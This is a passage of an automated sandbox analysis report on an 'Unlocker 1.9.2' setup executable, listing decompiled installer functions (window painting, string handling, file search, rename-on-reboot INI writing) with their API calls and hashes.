                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                                              • Opcode ID: 660c1fc254df36beb57d81b90febdada7011a4db7affac3806782aa2ca0af1b7
                                                                                                                                                              • Instruction ID: 64f8da0eb6fa4cceecf9efc48ddd89885d4d712a4f1a1a74ac23683e4b195719
                                                                                                                                                              • Opcode Fuzzy Hash: 660c1fc254df36beb57d81b90febdada7011a4db7affac3806782aa2ca0af1b7
                                                                                                                                                              • Instruction Fuzzy Hash: 42B09276608240BFCA125F40DE04E0ABB72BBA4312F00C424BB98641B082325422EF0A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DB1(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x420470, _a4); // executed
				return _t2;
			}




                                                                                                                                                              0x00403dbb
                                                                                                                                                              0x00403dc1

                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403B8E), ref: 00403DBB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: 3d2371042bc9023e882d1747a0204cba7e5e06de41843067423b9fd361121a1b
                                                                                                                                                              • Instruction ID: b3b70422baabf746d7f85ff150f7fad2421cb985b3c304c2f0a1b2ed4b2bd08a
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2371042bc9023e882d1747a0204cba7e5e06de41843067423b9fd361121a1b
                                                                                                                                                              • Instruction Fuzzy Hash: A2A00275515100DBCA115B50DE048057A61B754705F41D475B2455017587315461EB5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004054FB Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004054FB(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                                                                              0x004054fb
                                                                                                                                                              0x0040550e
                                                                                                                                                              0x0040550e
                                                                                                                                                              0x00405512
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405505
                                                                                                                                                              0x00405508
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405508
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405505
                                                                                                                                                              0x00405514

                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(?,00403176,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000020), ref: 00405508
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3213498283-0
                                                                                                                                                              • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                                                                                              • Instruction ID: 4d956687522218a8d382f60df26940a2f5368e95d4cbeb2580b699aececf1af3
                                                                                                                                                              • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                                                                                              • Instruction Fuzzy Hash: 9BC0806440C54077C5105B204C344677FE5AA91745F249897F4C163155C134A840CB3B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 0040263E Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                              			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040593B(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059DD();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                                                              0x00402656
                                                                                                                                                              0x0040266a
                                                                                                                                                              0x00402675
                                                                                                                                                              0x00402676
                                                                                                                                                              0x004027b1
                                                                                                                                                              0x00402658
                                                                                                                                                              0x00402658
                                                                                                                                                              0x0040265a
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: 7ce125ca612887df162c36b751337e4c26a37c050d4ffda7300b23609ce4967c
                                                                                                                                                              • Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
                                                                                                                                                              • Opcode Fuzzy Hash: 7ce125ca612887df162c36b751337e4c26a37c050d4ffda7300b23609ce4967c
                                                                                                                                                              • Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423e90; // 0x73eeb0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Unlocker 1.9.2 Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423e88; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                                                                                              0x0040100a
                                                                                                                                                              0x00401039
                                                                                                                                                              0x00401047
                                                                                                                                                              0x0040104d
                                                                                                                                                              0x00401051
                                                                                                                                                              0x0040105b
                                                                                                                                                              0x00401061
                                                                                                                                                              0x00401064
                                                                                                                                                              0x004010f3
                                                                                                                                                              0x00401089
                                                                                                                                                              0x0040108c
                                                                                                                                                              0x004010a6
                                                                                                                                                              0x004010bd
                                                                                                                                                              0x004010cc
                                                                                                                                                              0x004010cf
                                                                                                                                                              0x004010d5
                                                                                                                                                              0x004010d9
                                                                                                                                                              0x004010e4
                                                                                                                                                              0x004010ed
                                                                                                                                                              0x004010ef
                                                                                                                                                              0x004010ef
                                                                                                                                                              0x00401100
                                                                                                                                                              0x00401105
                                                                                                                                                              0x0040110d
                                                                                                                                                              0x00401110
                                                                                                                                                              0x00401112
                                                                                                                                                              0x00401118
                                                                                                                                                              0x0040111f
                                                                                                                                                              0x00401126
                                                                                                                                                              0x00401130
                                                                                                                                                              0x00401142
                                                                                                                                                              0x00401156
                                                                                                                                                              0x00401160
                                                                                                                                                              0x00401165
                                                                                                                                                              0x00401165
                                                                                                                                                              0x00401110
                                                                                                                                                              0x0040116e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401178
                                                                                                                                                              0x00401010
                                                                                                                                                              0x00401013
                                                                                                                                                              0x00401015
                                                                                                                                                              0x00401019
                                                                                                                                                              0x0040101f
                                                                                                                                                              0x0040101f
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                              • DrawTextA.USER32(00000000,Unlocker 1.9.2 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                              • String ID: F$Unlocker 1.9.2 Setup
                                                                                                                                                              • API String ID: 941294808-1352916206
                                                                                                                                                              • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                                                              • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                                                                                                                                              • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                                                              • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040572B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E0040572B() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405CFF(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f10 =  *0x423f10 + 1;
						return _t20;
					}
				}
				 *0x422608 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422080, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421c80, "%s=%s\r\n", 0x422608, 0x422080);
						_t18 =  *0x423e90; // 0x73eeb0
						_t56 = _t55 + 0x10;
						E004059FF(_t43, 0x400, 0x422080, 0x422080,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E004056B4(0x422080, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405629(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405629(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405675(_t51 + _t29, 0x421c80, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059DD(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056B4(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422608, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                                                                                              0x00405731
                                                                                                                                                              0x00405738
                                                                                                                                                              0x0040573c
                                                                                                                                                              0x00405745
                                                                                                                                                              0x00405749
                                                                                                                                                              0x00405888
                                                                                                                                                              0x00405888
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405888
                                                                                                                                                              0x00405749
                                                                                                                                                              0x00405755
                                                                                                                                                              0x0040576b
                                                                                                                                                              0x00405793
                                                                                                                                                              0x0040579e
                                                                                                                                                              0x004057a2
                                                                                                                                                              0x004057c2
                                                                                                                                                              0x004057c4
                                                                                                                                                              0x004057c9
                                                                                                                                                              0x004057d3
                                                                                                                                                              0x004057e0
                                                                                                                                                              0x004057e5
                                                                                                                                                              0x004057ea
                                                                                                                                                              0x004057ee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004057fd
                                                                                                                                                              0x004057ff
                                                                                                                                                              0x0040580c
                                                                                                                                                              0x00405810
                                                                                                                                                              0x00405881
                                                                                                                                                              0x00405882
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040582c
                                                                                                                                                              0x00405839
                                                                                                                                                              0x0040589e
                                                                                                                                                              0x004058a5
                                                                                                                                                              0x0040584c
                                                                                                                                                              0x0040584c
                                                                                                                                                              0x0040584e
                                                                                                                                                              0x00405857
                                                                                                                                                              0x00405862
                                                                                                                                                              0x00405874
                                                                                                                                                              0x0040587b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040587b
                                                                                                                                                              0x004058a7
                                                                                                                                                              0x004058a8
                                                                                                                                                              0x004058ad
                                                                                                                                                              0x004058af
                                                                                                                                                              0x004058bc
                                                                                                                                                              0x004058bc
                                                                                                                                                              0x004058c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004058b1
                                                                                                                                                              0x004058b1
                                                                                                                                                              0x004058b4
                                                                                                                                                              0x004058b7
                                                                                                                                                              0x004058b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004058b1
                                                                                                                                                              0x00405844
                                                                                                                                                              0x00405849
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405849
                                                                                                                                                              0x00405810
                                                                                                                                                              0x0040576d
                                                                                                                                                              0x00405778
                                                                                                                                                              0x00405781
                                                                                                                                                              0x00405785
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405785
                                                                                                                                                              0x00405892

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405781
                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                                                                                                              • wsprintfA.USER32 ref: 004057BC
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 0040587B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                                                                                                                                                • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                                                                • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                                                              • String ID: %s=%s$[Rename]
                                                                                                                                                              • API String ID: 3772915668-1727408572
                                                                                                                                                              • Opcode ID: fde17059b73e5ed387f221ca3ca0721057c187c9f22db8a501a216d306c9fcdb
                                                                                                                                                              • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                                                                                                                                              • Opcode Fuzzy Hash: fde17059b73e5ed387f221ca3ca0721057c187c9f22db8a501a216d306c9fcdb
                                                                                                                                                              • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405C3F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405C3F(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040553D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054FB("*?|<>/\":", _t5))) == 0) {
							E00405675(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                              0x00405c41
                                                                                                                                                              0x00405c49
                                                                                                                                                              0x00405c5d
                                                                                                                                                              0x00405c5d
                                                                                                                                                              0x00405c63
                                                                                                                                                              0x00405c70
                                                                                                                                                              0x00405c70
                                                                                                                                                              0x00405c71
                                                                                                                                                              0x00405c73
                                                                                                                                                              0x00405c77
                                                                                                                                                              0x00405c79
                                                                                                                                                              0x00405c82
                                                                                                                                                              0x00405c84
                                                                                                                                                              0x00405c9e
                                                                                                                                                              0x00405ca6
                                                                                                                                                              0x00405ca6
                                                                                                                                                              0x00405cab
                                                                                                                                                              0x00405cad
                                                                                                                                                              0x00405caf
                                                                                                                                                              0x00405cb3
                                                                                                                                                              0x00405cb4
                                                                                                                                                              0x00405cb7
                                                                                                                                                              0x00405cbf
                                                                                                                                                              0x00405cc1
                                                                                                                                                              0x00405cc5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ccb
                                                                                                                                                              0x00405cd0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405cd0
                                                                                                                                                              0x00405cd5

                                                                                                                                                              APIs
                                                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                                                              • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                                                              • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
